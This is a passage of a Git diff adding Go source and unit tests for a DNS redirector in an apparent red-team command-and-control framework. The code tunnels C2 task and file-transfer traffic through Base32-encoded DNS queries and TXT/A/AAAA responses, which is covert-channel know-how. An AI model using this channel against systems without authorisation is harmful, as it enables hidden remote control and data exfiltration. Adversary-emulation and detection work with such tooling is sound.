uint32(len(conv.ResponseChunks[0])), + } + metadataBytes, err := proto.Marshal(metadata) + if err != nil { + return nil, fmt.Errorf("failed to marshal metadata: %w", err) + } + + slog.Debug("returning response metadata", "conv_id", conv.ID, "total_chunks", len(conv.ResponseChunks), + "total_size", len(conv.ResponseData), "crc32", conv.ResponseCRC) + + return metadataBytes, nil + } + + var fetchPayload dnspb.FetchPayload + if err := proto.Unmarshal(packet.Data, &fetchPayload); err != nil { + return nil, fmt.Errorf("failed to unmarshal fetch payload: %w", err) + } + + chunkIndex := int(fetchPayload.ChunkIndex) - 1 + + if chunkIndex < 0 || chunkIndex >= len(conv.ResponseChunks) { + return nil, fmt.Errorf("invalid chunk index: %d (expected 1-%d)", fetchPayload.ChunkIndex, len(conv.ResponseChunks)) + } + + slog.Debug("returning response chunk", "conv_id", conv.ID, "chunk", fetchPayload.ChunkIndex, + "size", len(conv.ResponseChunks[chunkIndex]), "total_chunks", len(conv.ResponseChunks)) + + return conv.ResponseChunks[chunkIndex], nil + } + + slog.Debug("returning response", "conv_id", conv.ID, "size", len(conv.ResponseData)) + + return conv.ResponseData, nil +} + +// forwardToUpstream sends request to gRPC server and returns response +func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.ClientConn, methodPath string, requestData []byte) ([]byte, error) { + md := metadata.New(map[string]string{}) + ctx = metadata.NewOutgoingContext(ctx, md) + + isClientStreaming := methodPath == "/c2.C2/ReportFile" + isServerStreaming := methodPath == "/c2.C2/FetchAsset" + + stream, err := upstream.NewStream(ctx, &grpc.StreamDesc{ + StreamName: methodPath, + ServerStreams: isServerStreaming, + ClientStreams: isClientStreaming, + }, methodPath, grpc.CallContentSubtype("raw")) + if err != nil { + return nil, fmt.Errorf("failed to create stream: %w", err) + } + + if isClientStreaming { + offset := 0 + chunkCount := 0 + for offset < len(requestData) { + if offset+4 > 
len(requestData) { + break + } + + msgLen := binary.BigEndian.Uint32(requestData[offset : offset+4]) + offset += 4 + + if offset+int(msgLen) > len(requestData) { + return nil, fmt.Errorf("invalid chunk length: %d bytes at offset %d", msgLen, offset) + } + + chunk := requestData[offset : offset+int(msgLen)] + if err := stream.SendMsg(chunk); err != nil { + return nil, fmt.Errorf("failed to send chunk %d: %w", chunkCount, err) + } + + offset += int(msgLen) + chunkCount++ + } + + slog.Debug("sent client streaming chunks", "method", methodPath, "chunks", chunkCount) + } else { + if err := stream.SendMsg(requestData); err != nil { + return nil, fmt.Errorf("failed to send request: %w", err) + } + } + + if err := stream.CloseSend(); err != nil { + return nil, fmt.Errorf("failed to close send: %w", err) + } + + var responseData []byte + if isServerStreaming { + responseCount := 0 + for { + var msg []byte + err := stream.RecvMsg(&msg) + if err != nil { + if errors.Is(err, io.EOF) { + break + } + return nil, fmt.Errorf("failed to receive message: %w", err) + } + + if len(msg) > 0 { + lengthPrefix := make([]byte, 4) + binary.BigEndian.PutUint32(lengthPrefix, uint32(len(msg))) + responseData = append(responseData, lengthPrefix...) + responseData = append(responseData, msg...) 
+ responseCount++ + } + } + slog.Debug("received server streaming responses", "method", methodPath, "count", responseCount) + } else { + if err := stream.RecvMsg(&responseData); err != nil { + return nil, fmt.Errorf("failed to receive response: %w", err) + } + } + + return responseData, nil +} + +// parseDomainNameAndType extracts domain name and query type +func (r *Redirector) parseDomainNameAndType(data []byte) (string, uint16, error) { + var labels []string + offset := 0 + + for offset < len(data) { + length := int(data[offset]) + if length == 0 { + break + } + offset++ + + if offset+length > len(data) { + return "", 0, fmt.Errorf("invalid domain name") + } + + label := string(data[offset : offset+length]) + labels = append(labels, label) + offset += length + } + + offset++ + + if offset+2 > len(data) { + return "", 0, fmt.Errorf("query too short for type field") + } + + queryType := binary.BigEndian.Uint16(data[offset : offset+2]) + domain := strings.Join(labels, ".") + + return domain, queryType, nil +} + +// sendDNSResponse sends a DNS response with appropriate record type (TXT/A/AAAA) +// For A/AAAA records with data larger than 4/16 bytes, multiple answer records are sent +func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16, domain string, queryType uint16, data []byte) { + if queryType == aRecordType || queryType == aaaaRecordType { + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(data) + data = []byte(encoded) + } + + var recordSize int + var answerCount uint16 + + switch queryType { + case txtRecordType: + recordSize = 0 + answerCount = 1 + case aRecordType: + recordSize = 4 + answerCount = uint16((len(data) + recordSize - 1) / recordSize) + if answerCount == 0 { + answerCount = 1 + } + case aaaaRecordType: + recordSize = 16 + answerCount = uint16((len(data) + recordSize - 1) / recordSize) + if answerCount == 0 { + answerCount = 1 + } + default: + recordSize = 0 + answerCount = 1 + 
} + + response := make([]byte, 0, 512) + + // DNS Header + response = append(response, byte(transactionID>>8), byte(transactionID)) + response = append(response, byte(dnsResponseFlags>>8), byte(dnsResponseFlags&0xFF)) + response = append(response, 0x00, 0x01) // Questions: 1 + response = append(response, byte(answerCount>>8), byte(answerCount&0xFF)) // Answers: multiple for A/AAAA + response = append(response, 0x00, 0x00) // Authority RRs: 0 + response = append(response, 0x00, 0x00) // Additional RRs: 0 + + for _, label := range strings.Split(domain, ".") { + if len(label) == 0 { + continue + } + response = append(response, byte(len(label))) + response = append(response, []byte(label)...) + } + response = append(response, 0x00) // End of domain + response = append(response, byte(queryType>>8), byte(queryType&0xFF)) // Type: original query type + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + + switch queryType { + case txtRecordType: + response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer + response = append(response, byte(queryType>>8), byte(queryType&0xFF)) // Type: TXT + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL + + var rdata []byte + if len(data) == 0 { + rdata = []byte{0x00} + } else { + tempData := data + for len(tempData) > 0 { + chunkSize := len(tempData) + if chunkSize > txtMaxChunkSize { + chunkSize = txtMaxChunkSize + } + rdata = append(rdata, byte(chunkSize)) + rdata = append(rdata, tempData[:chunkSize]...) + tempData = tempData[chunkSize:] + } + } + + response = append(response, byte(len(rdata)>>8), byte(len(rdata))) + response = append(response, rdata...) 
+ + case aRecordType: + for i := uint16(0); i < answerCount; i++ { + response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer + response = append(response, 0x00, byte(aRecordType)) // Type: A + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL + + response = append(response, 0x00, 0x04) + + start := int(i) * recordSize + end := start + recordSize + rdata := make([]byte, 4) + if start < len(data) { + copyEnd := end + if copyEnd > len(data) { + copyEnd = len(data) + } + copy(rdata, data[start:copyEnd]) + } + response = append(response, rdata...) + } + + case aaaaRecordType: + for i := uint16(0); i < answerCount; i++ { + response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer + response = append(response, 0x00, byte(aaaaRecordType)) // Type: AAAA + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL + + response = append(response, 0x00, 0x10) + + start := int(i) * recordSize + end := start + recordSize + rdata := make([]byte, 16) + if start < len(data) { + copyEnd := end + if copyEnd > len(data) { + copyEnd = len(data) + } + copy(rdata, data[start:copyEnd]) + } + response = append(response, rdata...) 
+ } + + default: + response = append(response, byte(dnsPointer>>8), byte(dnsPointer&0xFF)) // Name pointer + response = append(response, byte(queryType>>8), byte(queryType&0xFF)) // Type: match query + response = append(response, 0x00, byte(dnsClassIN)) // Class: IN + response = append(response, 0x00, 0x00, 0x00, byte(dnsTTLSeconds)) // TTL + response = append(response, 0x00, 0x00) // RDLENGTH: 0 + } + + if _, err := conn.WriteToUDP(response, addr); err != nil { slog.Error("failed to write DNS response", "error", err) } +} + +// sendErrorResponse sends a DNS error response +func (r *Redirector) sendErrorResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16) { + response := make([]byte, dnsHeaderSize) + binary.BigEndian.PutUint16(response[0:2], transactionID) + response[2] = byte(dnsErrorFlags >> 8) + response[3] = byte(dnsErrorFlags & 0xFF) + + if _, err := conn.WriteToUDP(response, addr); err != nil { slog.Error("failed to write DNS error response", "error", err) } +} diff --git a/tavern/internal/redirectors/dns/dns_test.go b/tavern/internal/redirectors/dns/dns_test.go new file mode 100644 index 000000000..3bec7bc85 --- /dev/null +++ b/tavern/internal/redirectors/dns/dns_test.go @@ -0,0 +1,993 @@ +package dns + +import ( + "context" + "encoding/base32" + "hash/crc32" + "net" + "sort" + "sync" + "testing" + "time" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + "google.golang.org/protobuf/proto" + "realm.pub/tavern/internal/c2/dnspb" +) + +// TestParseListenAddr tests the ParseListenAddr function +func TestParseListenAddr(t *testing.T) { + tests := []struct { + name string + input string + expectedAddr string + expectedDomains []string + expectError bool + }{ + { + name: "default port with multiple domains", + input: "0.0.0.0?domain=dnsc2.realm.pub&domain=foo.bar", + expectedAddr: "0.0.0.0:53", + expectedDomains: []string{"dnsc2.realm.pub", "foo.bar"}, + }, + { + name: "custom port with single domain", + input: "127.0.0.1:8053?domain=dnsc2.realm.pub", + expectedAddr: "127.0.0.1:8053", + expectedDomains: []string{"dnsc2.realm.pub"}, + }, + { + name: "no query params", + input: "0.0.0.0:5353",
+ expectedAddr: "0.0.0.0:5353", + expectedDomains: nil, + }, + { + name: "empty domain value", + input: "0.0.0.0?domain=", + expectedAddr: "0.0.0.0:53", + expectedDomains: nil, + }, + { + name: "mixed valid and empty domains", + input: "0.0.0.0?domain=valid.com&domain=&domain=also.valid", + expectedAddr: "0.0.0.0:53", + expectedDomains: []string{"valid.com", "also.valid"}, + }, + { + name: "malformed URL encoding", + input: "0.0.0.0?domain=%ZZ", + expectError: true, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + addr, domains, err := ParseListenAddr(tt.input) + + if tt.expectError { + assert.Error(t, err) + return + } + + require.NoError(t, err) + assert.Equal(t, tt.expectedAddr, addr) + assert.ElementsMatch(t, tt.expectedDomains, domains) + }) + } +} + +// TestExtractSubdomain tests subdomain extraction from full domain names +func TestExtractSubdomain(t *testing.T) { + r := &Redirector{ + baseDomains: []string{"dnsc2.realm.pub", "foo.bar.com"}, + } + + tests := []struct { + name string + domain string + expectedSubdom string + expectError bool + }{ + { + name: "simple subdomain", + domain: "test.dnsc2.realm.pub", + expectedSubdom: "test", + }, + { + name: "multi-label subdomain", + domain: "a.b.c.dnsc2.realm.pub", + expectedSubdom: "a.b.c", + }, + { + name: "subdomain with longer base domain", + domain: "test.foo.bar.com", + expectedSubdom: "test", + }, + { + name: "no matching base domain", + domain: "test.unknown.com", + expectError: true, + }, + { + name: "only base domain (no subdomain)", + domain: "dnsc2.realm.pub", + expectError: true, + }, + { + name: "case insensitive match", + domain: "test.DNSC2.REALM.PUB", + expectedSubdom: "test", + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + subdomain, err := r.extractSubdomain(tt.domain) + + if tt.expectError { + assert.Error(t, err) + return + } + + require.NoError(t, err) + assert.Equal(t, tt.expectedSubdom, subdomain) + }) + } +} + +// 
TestDecodePacket tests Base32 decoding and protobuf unmarshaling +func TestDecodePacket(t *testing.T) { + r := &Redirector{} + + t.Run("valid INIT packet", func(t *testing.T) { + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + Sequence: 0, + ConversationId: "test1234", + Data: []byte{0x01, 0x02, 0x03}, + } + packetBytes, err := proto.Marshal(packet) + require.NoError(t, err) + + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(packetBytes) + + decoded, err := r.decodePacket(encoded) + require.NoError(t, err) + assert.Equal(t, dnspb.PacketType_PACKET_TYPE_INIT, decoded.Type) + assert.Equal(t, "test1234", decoded.ConversationId) + assert.Equal(t, []byte{0x01, 0x02, 0x03}, decoded.Data) + }) + + t.Run("valid DATA packet with CRC", func(t *testing.T) { + data := []byte{0xDE, 0xAD, 0xBE, 0xEF} + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + Sequence: 1, + ConversationId: "test5678", + Data: data, + Crc32: crc32.ChecksumIEEE(data), + } + packetBytes, err := proto.Marshal(packet) + require.NoError(t, err) + + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(packetBytes) + + decoded, err := r.decodePacket(encoded) + require.NoError(t, err) + assert.Equal(t, dnspb.PacketType_PACKET_TYPE_DATA, decoded.Type) + assert.Equal(t, data, decoded.Data) + }) + + t.Run("DATA packet with invalid CRC", func(t *testing.T) { + data := []byte{0xDE, 0xAD, 0xBE, 0xEF} + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + Sequence: 1, + ConversationId: "test5678", + Data: data, + Crc32: 0xDEADBEEF, // Wrong CRC + } + packetBytes, err := proto.Marshal(packet) + require.NoError(t, err) + + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(packetBytes) + + _, err = r.decodePacket(encoded) + assert.Error(t, err) + assert.Contains(t, err.Error(), "CRC mismatch") + }) + + t.Run("invalid Base32", func(t *testing.T) { + _, err := 
r.decodePacket("!!!invalid!!!") + assert.Error(t, err) + }) + + t.Run("invalid protobuf", func(t *testing.T) { + // Valid Base32 but not valid protobuf + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString([]byte{0xFF, 0xFF, 0xFF}) + _, err := r.decodePacket(encoded) + assert.Error(t, err) + }) + + t.Run("packet with labels (dots)", func(t *testing.T) { + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "test1234", + } + packetBytes, err := proto.Marshal(packet) + require.NoError(t, err) + + encoded := base32.StdEncoding.WithPadding(base32.NoPadding).EncodeToString(packetBytes) + // Split into labels (simulating DNS format) + withDots := encoded[:4] + "." + encoded[4:] + + decoded, err := r.decodePacket(withDots) + require.NoError(t, err) + assert.Equal(t, "test1234", decoded.ConversationId) + }) +} + +// TestComputeAcksNacks tests the ACK range and NACK computation +func TestComputeAcksNacks(t *testing.T) { + r := &Redirector{} + + tests := []struct { + name string + chunks map[uint32][]byte + expectedAcks []*dnspb.AckRange + expectedNacks []uint32 + }{ + { + name: "empty chunks", + chunks: map[uint32][]byte{}, + expectedAcks: []*dnspb.AckRange{}, + expectedNacks: []uint32{}, + }, + { + name: "single chunk", + chunks: map[uint32][]byte{ + 1: {0x01}, + }, + expectedAcks: []*dnspb.AckRange{ + {StartSeq: 1, EndSeq: 1}, + }, + expectedNacks: []uint32{}, + }, + { + name: "consecutive chunks", + chunks: map[uint32][]byte{ + 1: {0x01}, + 2: {0x02}, + 3: {0x03}, + }, + expectedAcks: []*dnspb.AckRange{ + {StartSeq: 1, EndSeq: 3}, + }, + expectedNacks: []uint32{}, + }, + { + name: "gap in middle", + chunks: map[uint32][]byte{ + 1: {0x01}, + 2: {0x02}, + 5: {0x05}, + 6: {0x06}, + }, + expectedAcks: []*dnspb.AckRange{ + {StartSeq: 1, EndSeq: 2}, + {StartSeq: 5, EndSeq: 6}, + }, + expectedNacks: []uint32{3, 4}, + }, + { + name: "multiple gaps", + chunks: map[uint32][]byte{ + 1: {0x01}, + 3: {0x03}, + 5: {0x05}, + 
10: {0x0A}, + }, + expectedAcks: []*dnspb.AckRange{ + {StartSeq: 1, EndSeq: 1}, + {StartSeq: 3, EndSeq: 3}, + {StartSeq: 5, EndSeq: 5}, + {StartSeq: 10, EndSeq: 10}, + }, + expectedNacks: []uint32{2, 4, 6, 7, 8, 9}, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + conv := &Conversation{ + Chunks: tt.chunks, + } + + acks, nacks := r.computeAcksNacks(conv) + + // Sort both slices for comparison + sort.Slice(acks, func(i, j int) bool { return acks[i].StartSeq < acks[j].StartSeq }) + + assert.Equal(t, tt.expectedAcks, acks) + assert.Equal(t, tt.expectedNacks, nacks) + }) + } +} + +// TestHandleInitPacket tests INIT packet processing +func TestHandleInitPacket(t *testing.T) { + t.Run("valid init packet", func(t *testing.T) { + r := &Redirector{} + + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 5, + DataCrc32: 0x12345678, + FileSize: 1024, + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "conv1234", + Data: payloadBytes, + } + + responseData, err := r.handleInitPacket(packet) + require.NoError(t, err) + require.NotNil(t, responseData) + + // Verify response is a STATUS packet + var statusPacket dnspb.DNSPacket + err = proto.Unmarshal(responseData, &statusPacket) + require.NoError(t, err) + assert.Equal(t, dnspb.PacketType_PACKET_TYPE_STATUS, statusPacket.Type) + assert.Equal(t, "conv1234", statusPacket.ConversationId) + + // Verify conversation was created + val, ok := r.conversations.Load("conv1234") + require.True(t, ok) + conv := val.(*Conversation) + assert.Equal(t, "/c2.C2/ClaimTasks", conv.MethodPath) + assert.Equal(t, uint32(5), conv.TotalChunks) + assert.Equal(t, uint32(0x12345678), conv.ExpectedCRC) + assert.Equal(t, uint32(1024), conv.ExpectedDataSize) + }) + + t.Run("invalid init payload", func(t *testing.T) { + r := &Redirector{} + + packet := &dnspb.DNSPacket{ + 
Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "conv1234", + Data: []byte{0xFF, 0xFF}, // Invalid protobuf + } + + _, err := r.handleInitPacket(packet) + assert.Error(t, err) + }) + + t.Run("data size exceeds maximum", func(t *testing.T) { + r := &Redirector{} + + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 1, + FileSize: MaxDataSize + 1, // Exceeds limit + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "conv1234", + Data: payloadBytes, + } + + _, err = r.handleInitPacket(packet) + assert.Error(t, err) + assert.Contains(t, err.Error(), "exceeds maximum") + }) + + t.Run("max conversations reached", func(t *testing.T) { + r := &Redirector{ + conversationCount: MaxActiveConversations, + } + + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 1, + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "conv1234", + Data: payloadBytes, + } + + _, err = r.handleInitPacket(packet) + assert.Error(t, err) + assert.Contains(t, err.Error(), "max active conversations") + }) +} + +// TestHandleFetchPacket tests FETCH packet processing +func TestHandleFetchPacket(t *testing.T) { + t.Run("fetch single response", func(t *testing.T) { + r := &Redirector{} + responseData := []byte("test response data") + + conv := &Conversation{ + ID: "conv1234", + ResponseData: responseData, + LastActivity: time.Now(), + } + r.conversations.Store("conv1234", conv) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", + } + + data, err := r.handleFetchPacket(packet) + require.NoError(t, err) + assert.Equal(t, responseData, data) + }) + + t.Run("fetch chunked response metadata", func(t *testing.T) { + r := &Redirector{} + 
responseData := []byte("full response") + responseCRC := crc32.ChecksumIEEE(responseData) + + conv := &Conversation{ + ID: "conv1234", + ResponseData: responseData, + ResponseChunks: [][]byte{[]byte("chunk1"), []byte("chunk2")}, + ResponseCRC: responseCRC, + LastActivity: time.Now(), + } + r.conversations.Store("conv1234", conv) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", + Data: nil, // No payload = request metadata + } + + data, err := r.handleFetchPacket(packet) + require.NoError(t, err) + + var metadata dnspb.ResponseMetadata + err = proto.Unmarshal(data, &metadata) + require.NoError(t, err) + assert.Equal(t, uint32(2), metadata.TotalChunks) + assert.Equal(t, responseCRC, metadata.DataCrc32) + }) + + t.Run("fetch specific chunk", func(t *testing.T) { + r := &Redirector{} + + conv := &Conversation{ + ID: "conv1234", + ResponseData: []byte("full"), + ResponseChunks: [][]byte{[]byte("chunk0"), []byte("chunk1"), []byte("chunk2")}, + LastActivity: time.Now(), + } + r.conversations.Store("conv1234", conv) + + fetchPayload := &dnspb.FetchPayload{ChunkIndex: 2} // 1-indexed + payloadBytes, err := proto.Marshal(fetchPayload) + require.NoError(t, err) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", + Data: payloadBytes, + } + + data, err := r.handleFetchPacket(packet) + require.NoError(t, err) + assert.Equal(t, []byte("chunk1"), data) // 1-indexed -> 0-indexed + }) + + t.Run("fetch unknown conversation", func(t *testing.T) { + r := &Redirector{} + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "unknown", + } + + _, err := r.handleFetchPacket(packet) + assert.Error(t, err) + assert.Contains(t, err.Error(), "conversation not found") + }) + + t.Run("fetch with no response ready", func(t *testing.T) { + r := &Redirector{} + + conv := &Conversation{ + ID: "conv1234", + ResponseData: nil, // No response yet + 
LastActivity: time.Now(), + } + r.conversations.Store("conv1234", conv) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", + } + + _, err := r.handleFetchPacket(packet) + assert.Error(t, err) + assert.Contains(t, err.Error(), "no response data") + }) + + t.Run("fetch chunk out of bounds", func(t *testing.T) { + r := &Redirector{} + + conv := &Conversation{ + ID: "conv1234", + ResponseData: []byte("full"), + ResponseChunks: [][]byte{[]byte("chunk0")}, + LastActivity: time.Now(), + } + r.conversations.Store("conv1234", conv) + + fetchPayload := &dnspb.FetchPayload{ChunkIndex: 10} // Out of bounds + payloadBytes, err := proto.Marshal(fetchPayload) + require.NoError(t, err) + + packet := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_FETCH, + ConversationId: "conv1234", + Data: payloadBytes, + } + + _, err = r.handleFetchPacket(packet) + assert.Error(t, err) + assert.Contains(t, err.Error(), "invalid chunk index") + }) +} + +// TestParseDomainNameAndType tests DNS query parsing +func TestParseDomainNameAndType(t *testing.T) { + r := &Redirector{} + + tests := []struct { + name string + query []byte + expectDomain string + expectType uint16 + expectError bool + }{ + { + name: "valid TXT query", + query: func() []byte { + q := []byte{ + 5, 'd', 'n', 's', 'c', '2', // "dnsc2" + 5, 'r', 'e', 'a', 'l', 'm', // "realm" + 3, 'p', 'u', 'b', // "pub" + 0, // null terminator + 0, 16, // Type: TXT + 0, 1, // Class: IN + } + return q + }(), + expectDomain: "dnsc2.realm.pub", + expectType: 16, + }, + { + name: "valid A query", + query: func() []byte { + q := []byte{ + 4, 't', 'e', 's', 't', // "test" + 5, 'd', 'n', 's', 'c', '2', // "dnsc2" + 5, 'r', 'e', 'a', 'l', 'm', // "realm" + 3, 'p', 'u', 'b', // "pub" + 0, // null terminator + 0, 1, // Type: A + 0, 1, // Class: IN + } + return q + }(), + expectDomain: "test.dnsc2.realm.pub", + expectType: 1, + }, + { + name: "valid AAAA query", + query: func() []byte { + q := 
+				[]byte{
+					3, 'w', 'w', 'w', // "www"
+					4, 't', 'e', 's', 't', // "test"
+					3, 'c', 'o', 'm', // "com"
+					0,     // null terminator
+					0, 28, // Type: AAAA
+					0, 1, // Class: IN
+				}
+				return q
+			}(),
+			expectDomain: "www.test.com",
+			expectType:   28,
+		},
+		{
+			name:        "truncated query",
+			query:       []byte{7, 'e', 'x', 'a'}, // Incomplete
+			expectError: true,
+		},
+		{
+			name:        "query too short for type",
+			query:       []byte{4, 't', 'e', 's', 't', 0}, // Missing type/class
+			expectError: true,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			domain, queryType, err := r.parseDomainNameAndType(tt.query)
+
+			if tt.expectError {
+				assert.Error(t, err)
+				return
+			}
+
+			require.NoError(t, err)
+			assert.Equal(t, tt.expectDomain, domain)
+			assert.Equal(t, tt.expectType, queryType)
+		})
+	}
+}
+
+// TestConversationCleanup tests cleanup of stale conversations
+func TestConversationCleanup(t *testing.T) {
+	r := &Redirector{
+		conversationTimeout: 15 * time.Minute,
+	}
+
+	// Create stale conversation
+	staleConv := &Conversation{
+		ID:           "stale",
+		LastActivity: time.Now().Add(-20 * time.Minute),
+	}
+	r.conversations.Store("stale", staleConv)
+	r.conversationCount = 1
+
+	// Create fresh conversation
+	freshConv := &Conversation{
+		ID:           "fresh",
+		LastActivity: time.Now(),
+	}
+	r.conversations.Store("fresh", freshConv)
+	r.conversationCount = 2
+
+	// Run cleanup
+	now := time.Now()
+	r.conversations.Range(func(key, value any) bool {
+		conv := value.(*Conversation)
+		conv.mu.Lock()
+		if now.Sub(conv.LastActivity) > r.conversationTimeout {
+			r.conversations.Delete(key)
+			r.conversationCount--
+		}
+		conv.mu.Unlock()
+		return true
+	})
+
+	// Verify stale was removed
+	_, ok := r.conversations.Load("stale")
+	assert.False(t, ok, "stale conversation should be removed")
+
+	// Verify fresh remains
+	_, ok = r.conversations.Load("fresh")
+	assert.True(t, ok, "fresh conversation should remain")
+
+	assert.Equal(t, int32(1), r.conversationCount)
+}
+
+// TestConcurrentConversationAccess tests thread safety of conversation handling
+func TestConcurrentConversationAccess(t *testing.T) {
+	r := &Redirector{}
+
+	initPayload := &dnspb.InitPayload{
+		MethodCode:  "/c2.C2/ClaimTasks",
+		TotalChunks: 100,
+		DataCrc32:   0,
+		FileSize:    0,
+	}
+	payloadBytes, err := proto.Marshal(initPayload)
+	require.NoError(t, err)
+
+	packet := &dnspb.DNSPacket{
+		Type:           dnspb.PacketType_PACKET_TYPE_INIT,
+		ConversationId: "concurrent",
+		Data:           payloadBytes,
+	}
+
+	_, err = r.handleInitPacket(packet)
+	require.NoError(t, err)
+
+	// Concurrent access to store chunks
+	var wg sync.WaitGroup
+	for i := uint32(1); i <= 100; i++ {
+		wg.Add(1)
+		go func(seq uint32) {
+			defer wg.Done()
+
+			val, ok := r.conversations.Load("concurrent")
+			if !ok {
+				return
+			}
+			conv := val.(*Conversation)
+			conv.mu.Lock()
+			conv.Chunks[seq] = []byte{byte(seq)}
+			conv.mu.Unlock()
+		}(i)
+	}
+	wg.Wait()
+
+	// Verify all chunks stored
+	val, ok := r.conversations.Load("concurrent")
+	require.True(t, ok)
+	conv := val.(*Conversation)
+	assert.Len(t, conv.Chunks, 100)
+}
+
+// TestBuildDNSResponse tests DNS response packet construction
+func TestBuildDNSResponse(t *testing.T) {
+	r := &Redirector{}
+
+	// Create a mock UDP connection for testing
+	serverAddr, err := net.ResolveUDPAddr("udp", "127.0.0.1:0")
+	require.NoError(t, err)
+	serverConn, err := net.ListenUDP("udp", serverAddr)
+	require.NoError(t, err)
+	defer serverConn.Close()
+
+	clientAddr, err := net.ResolveUDPAddr("udp", "127.0.0.1:0")
+	require.NoError(t, err)
+	clientConn, err := net.ListenUDP("udp", clientAddr)
+	require.NoError(t, err)
+	defer clientConn.Close()
+
+	t.Run("TXT record response", func(t *testing.T) {
+		r.sendDNSResponse(serverConn, clientConn.LocalAddr().(*net.UDPAddr), 0x1234, "test.dnsc2.realm.pub", txtRecordType, []byte("hello"))
+
+		buf := make([]byte, 512)
+		clientConn.SetReadDeadline(time.Now().Add(time.Second))
+		n, _, err := clientConn.ReadFromUDP(buf)
+		require.NoError(t, err)
+
+		// Verify transaction ID
+		assert.Equal(t, uint16(0x1234), uint16(buf[0])<<8|uint16(buf[1]))
+		// Verify it's a response (QR bit set)
+		assert.True(t, buf[2]&0x80 != 0)
+		// Verify answer count is 1
+		assert.Equal(t, uint16(1), uint16(buf[6])<<8|uint16(buf[7]))
+
+		// Response should contain data
+		assert.Greater(t, n, 12)
+	})
+}
+
+// TestHandleDataPacket tests DATA packet processing and chunk storage
+func TestHandleDataPacket(t *testing.T) {
+	t.Run("store single chunk", func(t *testing.T) {
+		r := &Redirector{}
+		ctx := context.Background()
+
+		// Create conversation first with INIT - set TotalChunks > 1 to avoid completion
+		initPayload := &dnspb.InitPayload{
+			MethodCode:  "/c2.C2/ClaimTasks",
+			TotalChunks: 2, // Prevent completion on first chunk
+			DataCrc32:   crc32.ChecksumIEEE([]byte{0x01, 0x02}),
+			FileSize:    2,
+		}
+		payloadBytes, err := proto.Marshal(initPayload)
+		require.NoError(t, err)
+
+		initPacket := &dnspb.DNSPacket{
+			Type:           dnspb.PacketType_PACKET_TYPE_INIT,
+			ConversationId: "data1234",
+			Data:           payloadBytes,
+		}
+		_, err = r.handleInitPacket(initPacket)
+		require.NoError(t, err)
+
+		// Send DATA packet
+		dataPacket := &dnspb.DNSPacket{
+			Type:           dnspb.PacketType_PACKET_TYPE_DATA,
+			ConversationId: "data1234",
+			Sequence:       1,
+			Data:           []byte{0x01},
+		}
+
+		statusData, err := r.handleDataPacket(ctx, nil, dataPacket, txtRecordType)
+		require.NoError(t, err)
+
+		// Verify STATUS response
+		var statusPacket dnspb.DNSPacket
+		err = proto.Unmarshal(statusData, &statusPacket)
+		require.NoError(t, err)
+		assert.Equal(t, dnspb.PacketType_PACKET_TYPE_STATUS, statusPacket.Type)
+		assert.Equal(t, "data1234", statusPacket.ConversationId)
+
+		// Verify chunk was stored
+		val, ok := r.conversations.Load("data1234")
+		require.True(t, ok)
+		conv := val.(*Conversation)
+		assert.Len(t, conv.Chunks, 1)
+		assert.Equal(t, []byte{0x01}, conv.Chunks[1])
+	})
+
+	t.Run("store multiple chunks with gaps", func(t *testing.T) {
+		r := &Redirector{}
